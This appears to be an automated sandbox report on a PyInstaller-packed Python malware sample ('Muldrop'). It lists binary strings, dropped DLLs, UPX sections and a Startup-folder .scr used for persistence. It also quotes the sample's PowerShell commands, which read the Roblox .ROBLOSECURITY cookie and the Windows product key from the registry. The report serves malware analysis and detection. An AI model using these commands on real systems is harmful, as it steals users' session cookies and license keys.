              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1771559023.00007FF8E7316000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1769130422.00007FF8E6D1F000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1u 30 May 2023built on: Wed May 31 23:27:41 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1769130422.00007FF8E6D1F000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.pdb source: powershell.exe, 0000002D.00000002.1546305256.0000014D0A895000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1323859878.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1777638833.00007FF8F9D71000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1323859878.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1777638833.00007FF8F9D71000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1769130422.00007FF8E6DA1000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000048.00000000.1631513880.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp, rar.exe.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1774041313.00007FF8E795B000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1771559023.00007FF8E7316000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776891927.00007FF8F6DA1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773840617.00007FF8E75B1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775280182.00007FF8F0941000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776711949.00007FF8F5851000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776445085.00007FF8F1DF1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775912815.00007FF8F0D01000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772235361.00007FF8E7361000.00000040.00000001.01000000.0000000E.sdmp
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
              Source: libcrypto-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x124d75
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x19e1b
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x4a227
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1784a
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x17418
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9ff17
              Source: libssl-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x349c6
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: real checksum: 0x6f5100 should be: 0x6f6e8e
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xc985
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15415
              Source: python311.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1a7f3d
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1f8c8
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xa12c
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x12345
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x23dc5
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1deb7
              Source: c3m2uwl3.dll.49.drStatic PE information: real checksum: 0x0 should be: 0xa11f
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeStatic PE information: section name: _RDATA
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 2_2_00007FF8E754D418 push rsi; retf 2_2_00007FF8E754D419
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 2_2_00007FF8E754D390 push rsi; iretd 2_2_00007FF8E754D3A5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF88697D2A5 pushad ; iretd 9_2_00007FF88697D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF886A98AAB push eax; iretd 9_2_00007FF886A98ABA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF886A99DF8 push E95C6F79h; ret 9_2_00007FF886A99E79
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF886AB19D3 pushad ; ret 45_2_00007FF886AB19D9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FF886AB4203 push ebp; iretd 45_2_00007FF886AB4232
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\libcrypto-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\_lzma.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\libssl-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\python311.dllJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76002\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10F51E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF7B10F51E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
